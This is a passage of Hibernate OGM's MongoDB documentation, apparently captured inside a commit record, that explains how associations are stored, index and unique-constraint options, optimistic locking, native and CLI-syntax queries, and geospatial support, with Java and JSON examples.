\"English\"\n}\n----\n\nassociations_ClassRoom_Student\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nassociations_AccountOwner_BankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-one-collection-strategy-join-table]]\nYou can change the name of the collection containing the association using the `@JoinTable` annotation.\nIn the following example, the name of the collection containing the association is `OwnerBankAccounts`\n(instead of the default `associations_AccountOwner_BankAccount`)\n\n.Bidirectional many-to-many using one collection per association strategy and @JoinTable\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n @JoinTable( name = \"OwnerBankAccounts\" )\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nOwnerBankAccount\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n 
\"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-association-document-strategy]]\n===== Global collection strategy\n\nWith this strategy, Hibernate OGM creates a single collection named `Associations`\nin which it will store all navigation information for all associations.\nEach document of this collection is structured in 2 parts.\nThe first is the `_id` field which contains the identifier information\nof the association owner and the name of the association table.\nThe second part is the `rows` field which stores (into an embedded collection) all ids\nthat the current instance is related to.\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n\nGenerally, you should not make use of this strategy\nunless embedding the association information proves to be too big for your document\nand you wish to separate them.\n====\n\n.Associations collection containing unidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n----\n====\n\nFor a bidirectional relationship, another document is created where ids are reversed.\nDon't worry, Hibernate OGM takes care of keeping them in sync:\n\n.Associations collection containing a bidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\": {\n \"bankAccounts_id\": \"accountXYZ\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"owner0001\" ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"Basket_Product\"\n },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional one-to-many using global collection strategy with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n \/\/ It will change the value stored in the field table in the Associations collection\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel 
Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"Basket_id\" : \"davide_basket\",\n \"table\" : \"BasketContent\"\n },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\n.Unidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n \"table\" : \"ClassRoom_Student\"\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using global collection strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner0001\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nAssociations collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"owner0001\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner0001\",\n \"table\" : \"AccountOwner_BankAccount\"\n },\n\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[ogm-mongodb-indexes-unique-constraints]]\n=== Indexes and unique constraints\n\n==== Standard indexes and unique constraints\n\nYou can create your index and unique constraints in MongoDB using the standard JPA annotations.\n\n.Creating indexes and unique constraints using JPA annotations\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_idx\", unique = true),\n @Index(columnList = \"name DESC\", name = \"name_desc_idx\")\n})\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n @Column(unique = true)\n private String url;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n[NOTE]\n====\nMongoDB supports unique constraints via unique indexes. It considers `null` as a value to be unique: you can only\nhave one `null` value per unique index. This is not what is commonly accepted as the definition of a unique constraint in\nthe JPA world. 
Thus, by default, we create the unique indexes as \`sparse\`: it only indexes defined values so that the\nunique constraints accept multiple \`null\` values.\n====\n\n==== Using MongoDB specific index options\n\nMongoDB supports https:\/\/docs.mongodb.com\/manual\/reference\/method\/db.collection.createIndex\/[a number of options for\nindex creation].\n\nIt is possible to define them using the \`@IndexOption\` annotation.\n\n.Creating indexes with MongoDB specific options\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author\", name = \"author_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_idx\", options = \"{ background : true, sparse : true, partialFilterExpression : { author: 'Verlaine' } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n\`@IndexOption\` simply passes the options to MongoDB at index creation: you can use every option available in MongoDB.\n\n==== Full text indexes\n\nMongoDB supports the ability to create one (and only one) full text index per collection.\n\nAs JPA does not support the ability to define \`text\` as an order in the \`@Index\` annotation (only \`ASC\` and \`DESC\`\nare supported), this ability has been included inside the \`@IndexOption\` mechanism. You simply need to add \`text: true\`\nto the options passed to MongoDB; Hibernate OGM interprets it and translates the index to a full text index.\n\n.Creating a full text index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n @Index(columnList = \"author, name\", name = \"author_name_text_idx\")\n})\n@IndexOptions(\n @IndexOption(forIndex = \"author_name_text_idx\", options = \"{ text: true, default_language : 'fr', weights : { author: 2, name: 5 } }\")\n)\npublic class Poem {\n\n @Id\n private String id;\n private String name;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n=== Transactions\n\nMongoDB does not support transactions.\nOnly changes applied to the same document are done atomically.\nA change applied to more than one document will not be applied atomically.\nThis problem is slightly mitigated by the fact that Hibernate OGM queues all changes\nbefore applying them during flush time.\nSo the window of time used to write to MongoDB is smaller than if you had written to the datastore manually.\n\nWe recommend that you still use transaction demarcations with Hibernate OGM\nto trigger the flush operation transparently (on commit).\nBut do not consider rollback as a possibility; this won't work.\n\n[[ogm-mongodb-optimisticlocking]]\n=== Optimistic Locking\n\nMongoDB does not provide a built-in mechanism for detecting concurrent updates to the same document\nbut it provides a way to execute atomic find and update operations.\nBy exploiting these commands Hibernate OGM can detect concurrent modifications to the same document.\n\nYou can enable optimistic locking detection using the annotation \`@Version\`:\n\n.Optimistic locking detection via \`@Version\`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"version\" : 0\n}\n----\n====\n\nThe \`@Version\` annotation defines which attribute will keep track of the version of the document;\nHibernate OGM will update the field when required, and if two changes from two different sessions (for example)\nare applied to the same document, an \`org.hibernate.StaleObjectStateException\` is thrown.
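\n\nThe following is a minimal sketch of how such a conflict surfaces, assuming an \`EntityManagerFactory emf\` and the \`Planet\` entity above (the id value is made up; with JPA the \`StaleObjectStateException\` typically arrives wrapped in a \`javax.persistence.RollbackException\` or \`OptimisticLockException\` at commit time):\n\n.Provoking an optimistic locking failure (sketch)\n====\n[source, JAVA]\n----\nEntityManager em1 = emf.createEntityManager();\nEntityManager em2 = emf.createEntityManager();\nem1.getTransaction().begin();\nem2.getTransaction().begin();\n\n\/\/ both sessions load version 0 of the same document\nPlanet p1 = em1.find( Planet.class, \"planet-1\" );\nPlanet p2 = em2.find( Planet.class, \"planet-1\" );\n\np1.setName( \"Pluto, the dwarf planet\" );\nem1.getTransaction().commit(); \/\/ succeeds, \"version\" becomes 1\n\np2.setName( \"Planet X\" );\ntry {\n \/\/ the atomic find-and-update detects the stale version\n em2.getTransaction().commit();\n}\ncatch (RollbackException e) {\n \/\/ the cause chain contains org.hibernate.StaleObjectStateException\n}\n----\n====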
\n\nYou can use \`@Column\` to change the name of the field created in MongoDB:\n\n.Optimistic locking detection via \`@Version\` using \`@Column\`\n====\n[source, JAVA]\n----\n@Entity\npublic class Planet implements Nameable {\n\n @Id\n private String id;\n private String name;\n\n @Version\n @Column(name=\"OPTLOCK\")\n private int version;\n\n \/\/ getters, setters ...\n}\n----\n\n----\n{\n \"_id\" : \"planet-1\",\n \"name\" : \"Pluto\",\n \"OPTLOCK\" : 0\n}\n----\n====\n\n[[ogm-mongodb-queries]]\n=== Queries\n\nYou can express queries in a few different ways:\n\n* using JPQL\n* using a native MongoQL query\n* using a Hibernate Search query (brings advanced full-text and geospatial queries)\n\nWhile you can use JPQL for simple queries, you might hit limitations.\nThe current recommended approach is to use native MongoQL\nif your query involves nested (list of) elements.\n\nMongoDB doesn't require Hibernate Search to run queries.\n\n[NOTE]\n====\nIn order to reflect changes performed in the current session,\nall entities affected by a given query are flushed to the datastore prior to query execution\n(that's the case for Hibernate ORM as well as Hibernate OGM).\n\nFor stores which are not fully transactional, such as MongoDB,\nthis can cause changes to be written as a side-effect of running queries,\nwhich cannot be reverted by a possible later rollback.\n\nDepending on your specific use cases and requirements you may prefer to disable auto-flushing,\ne.g. by invoking \`query.setFlushMode( FlushMode.MANUAL )\`.\nBear in mind though that query results will then not reflect changes applied within the current session.\n====\n\n==== JPQL queries\n\nHibernate OGM is a work in progress, so only a subset of JPQL constructs is available\nwhen using the JPQL query support. This includes:\n\n* simple comparisons using \"<\", \"+<=+\", \"=\", \">=\" and \">\"\n* \`IS NULL\` and \`IS NOT NULL\`\n* the boolean operators \`AND\`, \`OR\`, \`NOT\`\n* \`LIKE\`, \`IN\` and \`BETWEEN\`\n* \`ORDER BY\`\n* inner \`JOIN\` on embedded collections\n* projections of regular and embedded properties\n\nQueries using these constructs will be transformed into equivalent native MongoDB queries.
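\n\nFor instance, a simple JPQL query like the following sketch is translated into a native MongoDB find query (it reuses the \`Poem\` entity from the native query examples below; note that, unlike native queries, JPQL queries do support parameters):\n\n.Executing a JPQL query\n====\n[source, JAVA]\n----\nList<Poem> poems = em.createQuery(\n \"SELECT p FROM Poem p WHERE p.author = :author ORDER BY p.name\", Poem.class )\n .setParameter( \"author\", \"Oscar Wilde\" )\n .getResultList();\n----\n====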
\n\n[NOTE]\n====\nLet us know <<ogm-howtocontribute,by opening an issue or sending an email>>\nwhat query you wish to execute.\nExpanding our support in this area is high on our priority list.\n====\n\n[[ogm-mongodb-queries-native]]\n==== Native MongoDB queries\n\nHibernate OGM also supports certain forms of native queries for MongoDB.\nCurrently two forms of native queries are available via the MongoDB backend:\n\n* find queries specifying the search criteria only\n* queries specified using the MongoDB CLI syntax (<<ogm-mongodb-cli-syntax>>)\n\nThe former always maps results to entity types.\nThe latter either maps results to entity types or to certain supported forms of projection.\nNote that parameterized queries are not supported for native queries, so don't expect \`Query#setParameter()\` to work.\n\nYou can execute native queries as shown in the following example:\n\n.Using the JPA API\n====\n[source, JAVA]\n----\n@Entity\npublic class Poem {\n\n @Id\n private Long id;\n\n private String name;\n\n private String author;\n\n \/\/ getters, setters ...\n}\n\n...\n\njavax.persistence.EntityManager em = ...\n\n\/\/ criteria-only find syntax\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = (Poem) em.createNativeQuery( query1, Poem.class ).getSingleResult();\n\n\/\/ criteria-only find syntax with order-by\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = em.createNativeQuery( query2, Poem.class ).getResultList();\n\n\/\/ projection via CLI-syntax\nString query3 = \"db.WILDE_POEM.find(\" +\n \"{ '$query' : { 'name' : 'Athanasia' }, '$orderby' : { 'name' : 1 } }, \" +\n \"{ 'name' : 1 }\" +\n \")\";\n\n\/\/ will contain name and id as MongoDB always returns the id for projections\nList<Object[]> poemNames = (List<Object[]>) em.createNativeQuery( query3 ).getResultList();\n\n\/\/ count via CLI-syntax\nString query4 = \"db.WILDE_POEM.count({ 'name' : 'Athanasia' })\";\n\nObject[] count = (Object[]) em.createNativeQuery( query4 ).getSingleResult();\n----\n====\n\nThe result of a query is a managed entity (or a list thereof) or a projection of attributes in the form of an object array,\njust like you would get from a JPQL query.\n\n.Using the Hibernate native API\n====\n[source, JAVA]\n----\nOgmSession session = ...\n\nString query1 = \"{ $and: [ { name : 'Portia' }, { author : 'Oscar Wilde' } ] }\";\nPoem poem = session.createNativeQuery( query1 )\n .addEntity( \"Poem\", Poem.class )\n .uniqueResult();\n\nString query2 = \"{ $query : { author : 'Oscar Wilde' }, $orderby : { name : 1 } }\";\nList<Poem> poems = session.createNativeQuery( query2 )\n .addEntity( \"Poem\", Poem.class )\n .list();\n----\n====\n\nNative queries can also be created using the \`@NamedNativeQuery\` annotation:\n\n.Using @NamedNativeQuery\n====\n[source, JAVA]\n----\n@Entity\n@NamedNativeQuery(\n name = \"AthanasiaPoem\",\n query = \"{ $and: [ { name : 'Athanasia' }, { author : 'Oscar Wilde' } ] }\",\n resultClass = Poem.class )\npublic class Poem { ... 
}\n\n...\n\n\/\/ Using the EntityManager\nPoem poem1 = (Poem) em.createNamedQuery( \"AthanasiaPoem\" )\n .getSingleResult();\n\n\/\/ Using the Session\nPoem poem2 = (Poem) session.getNamedQuery( \"AthanasiaPoem\" )\n .uniqueResult();\n----\n====\n\nHibernate OGM stores data in a natural way so you can still execute queries using the\nMongoDB driver; the main drawback is that the results are going to be raw MongoDB\ndocuments and not managed entities.\n\n[[ogm-mongodb-cli-syntax]]\n\n===== CLI Syntax\n\nHibernate OGM can execute native queries expressed using the MongoDB CLI syntax with some limitations.\nCurrently \`find()\`, \`findOne()\`, \`findAndModify()\`, \`aggregate()\`, \`distinct()\`, and \`count()\` queries are supported. Furthermore, three\ntypes of write queries are supported via the CLI syntax: \`insert()\`, \`remove()\`, and \`update()\`. Other query\ntypes may be supported in future versions.\n\nAs one would expect, \`find()\`, \`findOne()\`, \`findAndModify()\`, \`aggregate()\`,\n\`distinct()\`, and \`count()\` can be executed using\n\`javax.persistence.Query.getSingleResult()\` or \`javax.persistence.Query.getResultList()\`, while \`insert()\`,\n\`remove()\`, and \`update()\` require using \`javax.persistence.Query.executeUpdate()\`. Also note that\n\`javax.persistence.Query.executeUpdate()\` may return \`-1\` in case execution of a query was not acknowledged\nrelative to the write concern used.\nVia \`javax.persistence.Query.executeUpdate()\` it is also possible to run \`db.Collection.drop()\`\nqueries.\n\n[NOTE]\n====\n\`db.Collection.drop()\` will always return 1. This is because the underlying driver we are\nusing doesn't return any value after the execution of the operation.\n====\n\n\nThe following functions can be used in the provided JSON:\n\`BinData\`, \`Date\`, \`HexData\`, \`ISODate\`, \`NumberLong\`, \`ObjectId\`, \`Timestamp\`,\n\`RegExp\`, \`DBPointer\`, \`UUID\`, \`GUID\`, \`CSUUID\`, \`CSGUID\`, \`JUUID\`, \`JGUID\`, \`PYUUID\`, \`PYGUID\`.\n\n[NOTE]\n====\n\`NumberInt\` is not supported as it is currently not supported by the MongoDB Java driver.\n====\n\nNo cursor operations such as \`sort()\` are supported.\nInstead use the corresponding MongoDB http:\/\/docs.mongodb.org\/manual\/reference\/operator\/query-modifier\/[query modifiers]\nsuch as \`$orderby\` within the criteria parameter.\n\nYou can limit the results of a query using the \`setMaxResults(...)\` method.\n\nJSON parameters passed via the CLI syntax must be specified using the\nhttp:\/\/docs.mongodb.org\/manual\/reference\/mongodb-extended-json\/[strict mode].\nSpecifically, keys need to be given within quotes; the only relaxation of this is that single quotes\nmay be used when specifying attribute names\/values to facilitate embedding queries within\nJava strings.\n\nNote that results of projections are returned as retrieved from the MongoDB driver at the moment and\nare not (yet) converted using suitable Hibernate OGM type implementations.\nThis requirement is tracked under https:\/\/hibernate.atlassian.net\/browse\/OGM-1031[OGM-1031].\n\n.CLI syntax examples\n====\n[source, JAVA]\n----\n\n\/\/ Valid syntax\nString valid = \"db.Poem.find({ \\\"name\\\" : \\\"Athanasia\\\" })\";\n\nString alsoValid = \"db.Poem.find({ '$or' : [{'name': 'Athanasia' }, {'name': 'Portia' }]})\";\n\nString validAggregation = \"db.Poem.aggregate([{ '$match': {'author': { '$regex': 'oscar.*', '$options': 'i' } } }, { '$sort': {'name': -1 } } ])\";\n\n\/\/ NOT Valid syntax, it will throw an exception: com.mongodb.util.JSONParseException\nString notValid = \"db.Poem.find({ name : \\\"Athanasia\\\" })\";\n\nString alsoNotValid = 
\"db.Poem.find({ $or : [{name: 'Athanasia' }, {name: 'Portia' }]})\";\n\n----\n====\n\n.CLI syntax sort and limit results alternatives\n====\n[source, JAVA]\n----\nString nativeQuery = \"db.Poem.find({ '$query': { 'author': 'Oscar Wilde' }, '$orderby' : { 'name' : 1 } })\";\n\n\/\/ Using hibernate session\nList<Poem> result = session.createNativeQuery( nativeQuery )\n\t.addEntity( Poem.class )\n\t.setMaxResults( 2 )\n\t.list();\n\n\/\/ Using JPA entity manager\nList<Poem> results = em.createNativeQuery( nativeQuery, Poem.class )\n\t.setMaxResults( 2 )\n\t.getResultList();\n----\n====\n\n.CLI syntax update examples\n====\n[source, JAVA]\n----\nString updateQuery = \"db.Poem.findAndModify({ 'query': {'_id': 1}, 'update': { '$set': { 'author': 'Oscar Wilde' } }, 'new': true })\";\nList<Poem> updated = session.createNativeQuery( updateQuery ).addEntity( Poem.class ).list();\n\nString insertQuery = \"db.Poem.insert({ '_id': { '$numberLong': '11' }, 'author': 'Oscar Wilder', 'name': 'The one and wildest', 'rating': '1' } )\";\nint inserted = session.createNativeQuery( insertQuery ).executeUpdate();\n\nString removeQuery = \"db.Poem.remove({ '_id': { '$numberLong': '11' } })\";\nint removed = session.createNativeQuery( removeQuery ).executeUpdate();\n----\n====\n\n[WARNING]\n====\nSupport for the `$regexp` operator is limited to the string syntax. We do not support the `\/pattern\/` syntax as it is not\ncurrently supported by the MongoDB Java driver.\n\n[source, JAVA]\n----\n\/\/ Valid syntax\nString nativeQuery = \"{ $query : { author : { $regex : '^Oscar' } }, $orderby : { name : 1 } }\";\nList<Poem> result = session.createNativeQuery( nativeQuery ).addEntity( Poem.class ).list();\n----\n====\n\n[[ogm-mongodb-stored-proc-native]]\n\n==== Server-side JavaScript and stored procedures\n\n[NOTE]\n====\nThis is an experimental feature.\n====\n\nIn MongoDB, it is possible to call server-side JavaScript as if it is a stored procedure.\nYou can use the existing methods in JPA:\n\n.Calling server-side JavaScript with positional parameters\n====\n[source, JAVA]\n----\n @Entity\n public class Car {\n @Id\n private Integer id;\n\n private String brand;\n\n ...\n }\n\n EntityManager em = ...\n StoredProcedureQuery storedProcedureQuery = em.createStoredProcedureQuery( \"findMostExpensiveCars\", Car.class );\n storedProcedureQuery.registerStoredProcedureParameter( \"year\", Integer.class, ParameterMode.IN );\n storedProcedureQuery.setParameter( \"year\", 1995 );\n List<Car> cars = storedProcedureQuery.getResultList();\n----\n====\n\nThis example will work assuming that there is a `findMostExpensiveCars` JavaScript function in MongoDB \nand that the result of the function is a list of cars that can be mapped to the `Car` entity.\n\n.Calling server-side JavaScript with Hibernate OGM with positional parameters\n====\n[source, JSON]\n----\n{\n \"result\" : [\n { \"id\":1, \"brand\":\"Bentley\" },\n { \"id\":2, \"brand\":\"Maserati\" },\n ]\n}\n----\n====\n\nMore details about server-side functions can be found in\nhttps:\/\/docs.mongodb.com\/manual\/core\/server-side-JavaScript[the MongoDB reference documentation].\n\n==== Hibernate Search\n\nYou can index your entities using Hibernate Search.\nThat way, a set of secondary indexes independent of MongoDB is maintained by Hibernate Search\nand you can run Lucene queries on top of them.\nThe benefit of this approach is a nice integration at the JPA \/ Hibernate API level\n(managed entities are returned by the queries).\nThe drawback is that you need to store the 
\n\n=== Geospatial support\n\n==== Geospatial fields\n\nOur MongoDB integration supports the ability to declare geospatial fields by using specific Java types that will be\nautomatically converted to GeoJSON objects stored in MongoDB.\n\nWe currently support the following types:\n\n * \`GeoPoint\`, stored as a GeoJSON Point\n * \`GeoMultiPoint\`, stored as a GeoJSON MultiPoint\n * \`GeoLineString\`, stored as a GeoJSON LineString\n * \`GeoMultiLineString\`, stored as a GeoJSON MultiLineString\n * \`GeoPolygon\`, stored as a GeoJSON Polygon\n * \`GeoMultiPolygon\`, stored as a GeoJSON MultiPolygon\n\nYou can find more information about these types and their constraints in the\nhttps:\/\/docs.mongodb.com\/manual\/reference\/geojson\/[MongoDB documentation].\n\n.Declaring a geospatial field\n====\n[source, JAVA]\n----\n@Entity\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nThese Java types come with handy constructors and helpers to help manipulate them.\n\n.Instantiating a polygon\n====\n[source, JAVA]\n----\nGeoPolygon polygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n----\n====\n\n==== Geospatial indexes and queries\n\nTo be able to run optimized queries on geospatial fields, you need to declare spatial indexes.\n\nYou can leverage your usual annotations to declare the indexes directly on your entities.\n\n.Declaring a geospatial index\n====\n[source, JAVA]\n----\n@Entity\n@Table(indexes = {\n\t\t@Index(columnList = \"location\", name = \"location_spatial_idx\")\n})\n@IndexOptions(\n\t\t@IndexOption(forIndex = \"location_spatial_idx\", options = \"{ _type: '2dsphere' }\")\n)\npublic class Restaurant {\n\n \/\/ [...]\n\n private GeoPoint location;\n}\n----\n====\n\nNote that you need to specify the type of the index using an \`@IndexOption\` annotation.\n\nThe next step is to execute a geospatial query using a native query.\n\n.Finding entities around a point\n====\n[source, JAVA]\n----\nGeoPoint geoPoint = new GeoPoint( 4.8520035, 45.7498209 );\n\nQuery query = session\n .createNativeQuery( \"{ location: { $near: { $geometry: \" + geoPoint.toBsonDocument() + \", $maxDistance: 500 } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\n.Finding entities within a polygon\n====\n[source, JAVA]\n----\nGeoPolygon geoPolygon = new GeoPolygon(\n new GeoPoint( 4.814922, 45.7753612 ),\n new GeoPoint( 4.8160825, 45.7327172 ),\n new GeoPoint( 4.9281299, 45.7211302 ),\n new GeoPoint( 4.8706127, 45.786724 ),\n new GeoPoint( 4.814922, 45.7753612 )\n);\n\nQuery query = session\n .createNativeQuery( \"{ location: { $geoWithin: { $geometry: \" + geoPolygon.toBsonDocument() + \" } } }\" )\n .addEntity( Restaurant.class );\nList<Restaurant> result = query.list();\n----\n====\n\nTo learn more about MongoDB spatial indexes and queries, please refer to the\nhttps:\/\/docs.mongodb.com\/manual\/geospatial-queries\/[MongoDB documentation].\n","old_contents":"[[ogm-mongodb]]\n\n== MongoDB\n\nhttp:\/\/www.mongodb.org[MongoDB] is a document-oriented datastore\nwritten in C++ with a strong emphasis on ease of use.\nThe nested nature of documents makes it a particularly natural fit for most 
object representations.\n\nThis implementation is based upon the MongoDB Java driver.\nThe currently supported version is {mongodb-version}.\n\n=== Why should I use Hibernate OGM with MongoDB\n\nIt is possible that in your project you have some entities that might benefit from MongoDB's\ndynamic schema, but having a schema makes it possible to obtain better performance because\nthe datastore can use the schema information to apply some optimizations that\nwouldn't otherwise be possible.\n\nJPA already has ways to define constraints and indexes, and via Hibernate OGM you can\nuse the same annotations for both your relational and non-relational needs.\n\nHibernate OGM cannot make MongoDB transactional but by using the JPA transaction demarcation\nmechanism it can group the operations and flush them to the datastore to\nminimize the number of requests.\n\nAnother benefit of using Hibernate OGM with MongoDB is that it will also make it possible\nto use Hibernate Search out of the box. Hibernate Search brings the power of Lucene\nto your project, giving you the ability to run fast Google-like searches.\n\nThis means that you can query the datastore using:\n\n* JPQL queries (see <<ogm-jpql-query>>)\n* MongoDB native queries (see <<ogm-mongodb-queries-native>>)\n* Full-text queries (see <<ogm-query-using-hibernate-search>>)\n\nOne of Hibernate OGM's main goals is to map entities in a \"natural\" way; this means that your\ndatastore will still be accessible in case you need to use other tools or want to run\nnative queries occasionally.\n\n=== Configuring MongoDB\n\nConfiguring Hibernate OGM to use MongoDB is easy:\n\n* Add the MongoDB module and driver to the classpath\n* Provide the MongoDB URL to Hibernate OGM\n\n==== Adding MongoDB dependencies\n\nTo add the dependencies via Maven, add the following 